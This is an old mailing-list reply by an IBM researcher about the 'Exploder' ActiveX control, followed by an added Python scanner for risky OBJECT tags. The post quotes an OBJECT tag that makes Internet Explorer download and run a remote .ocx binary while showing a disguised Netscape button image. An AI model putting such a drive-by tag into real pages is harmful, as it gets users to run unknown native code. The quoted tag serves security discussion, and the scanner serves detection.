
Re: ActiveX security hole reported.



I haven't tried it either, not having IE handy, but it
looks quite convincing.  I'm told that it pops up some
warnings about "this thing is not signed and may contain
a virus", but of course most people always push "OK"
on those out of habit.

This seems to be a step across a certain line.  Recently
I've been telling people that you can generally choose
between:

  - Things like Java and JavaScript, where you can
    unknowingly download and run stuff from a stranger
    with a single button-click, but at least it runs
    under a virtual machine that's designed to impose
    some controls, or

  - Things like normal binaries and ActiveX, where
    the things run on the bare metal with no access
    controls, but you have to take at least one
    action *outside* your browser to run them.

(The main exception being if you have Word set up as
your viewer for Word documents; then you can get a
virus directly from the browser by just clicking on
an infected DOC file.)

This stuff, though:

<A HREF="http://home.netscape.com/comprod/mirror/index.htm">
<OBJECT ID="Exploder1" WIDTH=86 HEIGHT=31
 CODEBASE="http://www.halcyon.com/mclain/ActiveX/Exploder.ocx"
 CLASSID="CLSID:DE70D9E3-C55A-11CF-8E43-780C02C10128">
    <PARAM NAME="_Version" VALUE="65536">
    <PARAM NAME="_ExtentX" VALUE="2646">
    <PARAM NAME="_ExtentY" VALUE="1323">
    <PARAM NAME="_StockProps" VALUE="0">
<IMG SRC="../../images/now20_button.gif" WIDTH=88 HEIGHT=31></OBJECT></A>

is new to me.  It seems to be instructing IE to download
the Exploder.ocx binary, and run it (after giving the user
some little popup warnings to make sure he didn't click
by accident).  Does anyone have a pointer to the semantics
of this sort of <OBJECT> tag?

- -- -
David M. Chess                    |     Remember:
High Integrity Computing Lab      |       it's your pineal gland,
IBM Watson Research               |           but it's their antenna!

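As an added example, not part of David Chess's post nor of the Exploder page it quotes: a small Python scanner for the practical question behind the message, namely which <OBJECT> tags on a page would make IE fetch and register a native control, and why each one is worth a look. It parses the markup with the standard library only; the page URL and the finding codes are assumptions made for this example, and the sample page is constructed from the snippet quoted above.

```python
"""Scan HTML for <OBJECT> tags that point IE at a native ActiveX control.

Added example, not code from the original post.  The sample page is built
from the snippet quoted in the post; the page URL and the finding codes are
assumptions made for this example.
"""
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# Constructed sample: the snippet from the post, wrapped in a minimal page.
SAMPLE_HTML = """<html><body>
<A HREF="http://home.netscape.com/comprod/mirror/index.htm">
<OBJECT ID="Exploder1" WIDTH=86 HEIGHT=31
 CODEBASE="http://www.halcyon.com/mclain/ActiveX/Exploder.ocx"
 CLASSID="CLSID:DE70D9E3-C55A-11CF-8E43-780C02C10128">
    <PARAM NAME="_Version" VALUE="65536">
    <PARAM NAME="_ExtentX" VALUE="2646">
    <PARAM NAME="_ExtentY" VALUE="1323">
    <PARAM NAME="_StockProps" VALUE="0">
<IMG SRC="../../images/now20_button.gif" WIDTH=88 HEIGHT=31></OBJECT></A>
</body></html>"""

# Assumed URL of the page the snippet lives on (the post does not say).
SAMPLE_PAGE_URL = "http://www.example.com/activex/index.htm"

# File types IE will download and register as native code via CODEBASE.
NATIVE_SUFFIXES = (".ocx", ".dll", ".exe", ".cab", ".inf")

# CLASSID="CLSID:xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx", braces optional.
CLSID_RE = re.compile(
    r"^clsid:\{?([0-9a-f]{8}(?:-[0-9a-f]{4}){3}-[0-9a-f]{12})\}?$", re.I)


class ObjectTagScanner(HTMLParser):
    """Collect every <OBJECT> with its attributes, PARAMs and fallback tags."""

    def __init__(self):
        super().__init__()
        self.objects = []
        self._current = None

    def handle_starttag(self, tag, attrs):
        attrs = {k.lower(): (v or "") for k, v in attrs}
        if tag == "object":
            match = CLSID_RE.match(attrs.get("classid", ""))
            self._current = {
                "id": attrs.get("id"),
                "clsid": match.group(1).upper() if match else None,
                "codebase": attrs.get("codebase"),
                "params": {},
                "fallback_tags": [],  # what a non-ActiveX browser renders
            }
            self.objects.append(self._current)
        elif self._current is not None:
            if tag == "param":
                self._current["params"][attrs.get("name", "")] = attrs.get("value", "")
            else:
                self._current["fallback_tags"].append(tag)

    def handle_endtag(self, tag):
        if tag == "object":
            self._current = None


def assess(obj, page_host):
    """Return finding codes (assumed names) for one parsed <OBJECT>."""
    findings = []
    if obj["clsid"] is None:
        findings.append("missing-or-malformed-classid")
    if obj["codebase"]:
        target = urlparse(obj["codebase"])
        # A CODEBASE on another host means the control is fetched from
        # wherever the page author points, not from the page's own site.
        if target.hostname and target.hostname.lower() != (page_host or "").lower():
            findings.append("remote-codebase")
        if target.path.lower().endswith(NATIVE_SUFFIXES):
            findings.append("native-code-codebase")
    if "img" in obj["fallback_tags"]:
        # An image as fallback is what makes the control pass for a button.
        findings.append("image-fallback")
    return findings


def scan(html, page_url):
    """Parse `html` (served from `page_url`) and attach findings to each OBJECT."""
    scanner = ObjectTagScanner()
    scanner.feed(html)
    scanner.close()
    host = urlparse(page_url).hostname
    return [dict(obj, findings=assess(obj, host)) for obj in scanner.objects]


if __name__ == "__main__":
    for obj in scan(SAMPLE_HTML, SAMPLE_PAGE_URL):
        print(obj["id"], obj["clsid"], obj["codebase"])
        for code in obj["findings"]:
            print("   ", code)
```

The scanner only reads markup. Whether IE actually shows the "not signed" prompts the post describes, or installs the control silently, is decided at download time by the browser's configured safety level and by whether the .ocx carries a signature, neither of which a static scan can see; treat a hit on both remote-codebase and native-code-codebase as "this page wants to install a binary", not as proof of what the binary does.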
